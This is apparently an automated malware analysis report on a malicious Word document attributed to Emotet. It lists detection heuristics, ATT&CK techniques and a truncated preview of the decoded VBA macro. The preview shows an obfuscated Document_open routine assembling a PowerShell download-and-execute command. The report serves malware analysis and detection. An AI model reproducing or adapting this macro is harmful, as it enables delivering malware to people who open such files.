MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro triggers a call to the 'Shell()' function, which is used to execute a PowerShell command. This PowerShell command is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Emotet-6958951-0' strongly suggests the Emotet family.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6958951-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6958951-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39919 bytes |
SHA-256: 684216f2601d2723b6d12e03d003a340c6c41855994047b98a1229900b475cf2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GrzhTXnzDzO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
jHEmN = 59537 + SDPVmV * 57981 + WXJNd / oniths - rIUzC * sACrPb + wITqJY + (65497 + rQdWk)
GHrLzi = 58409 + qNOEzJ * 39278 + EuImfD / qINwG - wINEw * wBHBFz + rzhsS + (16363 + rHTFlz)
ArqcRc = 95420 + cwjphX * 25921 + UYvwO / kjlFc - BlIWb * aDEsTB + crhKvz + (29737 + uTMNO)
MvwEXjSV = Application.Run("LOjXRfB", "" + ZtfmQauvVk + HUfulinfTokI + aDrXWllAMM + bDvpbwOu + iJspMwmlwrj + TbzHpwOwEw + lFjJvLrnm + qAiNvpa + UTTXQV + ViCzlznUUE + frQpiwvZYI + oVMdbkT + VhoWcHah + WsZIUYlAZ + iAuPTBZVaF + qBjcFUL + DlmXZtE + AMXazsDofMbJQv)
IfNFVj = 9205 + JQZVi * 50694 + dnMQdt / QzSiOa - OQNFN * ZBnKVN + QcCOj + (58086 + EpKNP)
ZppHTz = 89337 + AEQTa * 51178 + tjsRvC / JbCzS - Hrnqwr * EPtjB + JZtck + (28581 + PicXd)
POnnS = 58909 + vAMPUi * 38161 + zBvPrb / wDBjDU - FAqdb * nzWCj + VbqzL + (91794 + cpIRA)
End Sub
Attribute VB_Name = "bRklibNWvMZrH"
Function aDrXWllAMM()
On Error Resume Next
QfsVw = 77611 + WjVwlw * 16426 / jaTjLM + DvarT + Wjsva - 42995 * VCqcR
wzTsz = alfmrm - mqPEX * UiZRzw + 26893 / 74262 + AvLYF / aTLIz * BHDiFB
vGtDI = "" + qMLDtWTHmUbEt + uEVUzzdBKZHQjk + "POW" + sIjNiPoZA + GazSHtFwXww + "ERS" + MLBdmGmXuFjwK + fQvUwVXaL + "helL" + XboTTtDsAWNLnt + LUPWwir + " " + Chr(34)
AiIUp = 70911 * VmjLia + psRNrR / HafRL * vlCsj - MSOvY
USRwtCMzZ = "" + pBJFVkiZdi + zCtEcDdiukjrbL + ". ((" + bztCFtPFQa + XWHXbjXKZKS + "vaR" + HdERSdKWOwjl + GmnnCHDGXcMPso + "IAbL" + QiXUzPKowwlDJX + MpQXlXQOiAGb + "E "
lWTTi = Nuwrc - oFVzwA - 3677 - DDXfJ - OJqzJi / vLPkqo * 48261 * SsZvm - KsfDFa / ziwoKp / 76288 - EzhtQ
GPGLcB = KzjWKD - KtDIC - 91696 - QvjzlU - srCVo / lQztz * 58028 * XBEnf - mtGdkN / QqTaMr / 64356 - RFhAV
uwKLYj = OrsTB - VmNRIr - 1579 - wWjFws - wXmKz / wKTZp * 33305 * bchsq - AfrPsi / jwZdFb / 76307 - STFJD
MvOHEjijqb = "" + usSZqUUpnPw + EHufMWAkpTN + "'*" + IIbjmZdD + ZEvPdjppfv + "MDr*" + LLirDWrEY + jLLNEcXOWHkUbR + "')."
Bziii = uwQFvV - LszUI - 27399 - RVlMH - DGbrCa / AqFuWO * 95046 * OzzhC - LPkzS / DEfOR / 52329 - fnVZC
GVmFw = QmCYlf - arrqr - 69828 - svLqc - NRdtYz / dAqcf * 2819 * mRCGd - Wanwih / wjLKv / 55229 - hzJJA
bZBPL = MkbtEN - ZmdjPq - 61163 - zpjjC - rmItGp / uBmhS * 84486 * NESFi - duVctJ / FikVi / 18268 - VwTzzY
uICvwwLjpi = "" + rzwwaAsWawQU + jzzhMQRQw + "name" + kPlSIJM + icwLhFlN + "[3" + sWYhnAzrMNUa + zplHERoDVomDC + ",11," + HfDVOQiMhwRISA + EcINsUdIdvpAk + "2]-" + zNrFiQElXTdD + IWDkzibuZHmB + "jO"
TbdcnO = vavCX - qktPRU - 42291 - YlQkM - DokSh / MRwpA * 30489 * SNvHhb - kJfrVj / XupNs / 51493 - QGqdV
sjoNnaua = "" + nDOBZDHcii + YuIswAwpWHb + "IN" + pCGFiMZuLVbdU + PSKfjwhVwz + "'') " + GwBjbGMjAB + WjjMZhP + "( " + aaEwwYsIhIHzrS + ozXIXVNu + "\" + Chr(34) + " " + ANUwRiDa + wjfhTaTtPC + "$(" + mCkhsUVEM + nYfolqZuQlYN + "SeT-"
pozCU = IijaSL - qjFcLm - 94592 - JomiCq - NiOof / CjYCr * 59766 * IoFVZH - KLJMaI / jALUSp / 880 - ELijX
hZUHT = UiQIvH - BVBNWj - 41588 - NiZqdr - trskuH / jsTouM * 33413 * LXhDPj - QJnSX / ruRpr / 69360 - ZPLMpX
uhoJO = WCIab - jajwc - 69150 - swBzD - bVvLVN / wBWbwJ * 17537 * UsJPP - GwjOjF / sKsil / 62987 - zbqmMj
lzYkdutwIK = "" + HzTaJXF + otVWOzmHjFqd + "VaR" + cWDtBXDjj + ZRQiDVFzzznQbM + "Ia" + EDzraOkqEFiDVf + wcpjWdck + "BLe " + tQoFchIXwdj + LjZazrBiT + "'ofs" + UwXNdbaMFwU + wdzvzhi + "' '" + JdzwCftkz + NliJvuXDXbW + "')" + XcUuFhmL + ptNjZuT + "\" + Chr(34) + vtoMwnzDKbFnmn + aKziSnOOhp + Chr(43) + " [s" + NwIDFavSiPVG + cktQCGbHwkU + "TrI" + HfafJXSpLSC + rUqLosYo + "nG]"
UQmJGF = XiOvnn - jMinn - 31905 - riqOH - nvcTp / AFPWOL * 69151 * uTTQE - hbcJkB / Mciwuz / 78726 - cGvGq
UpUbD = WYOZK - jLSSio - 4899 - chaUMv - SMYKNt / HnpIzp * 81380 * TXjYF - KoMSo / amPzOI / 8470 - LpPzj
DaLIJX = "" + caqMzYNDlnp + YMrZvEVY + "( " +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.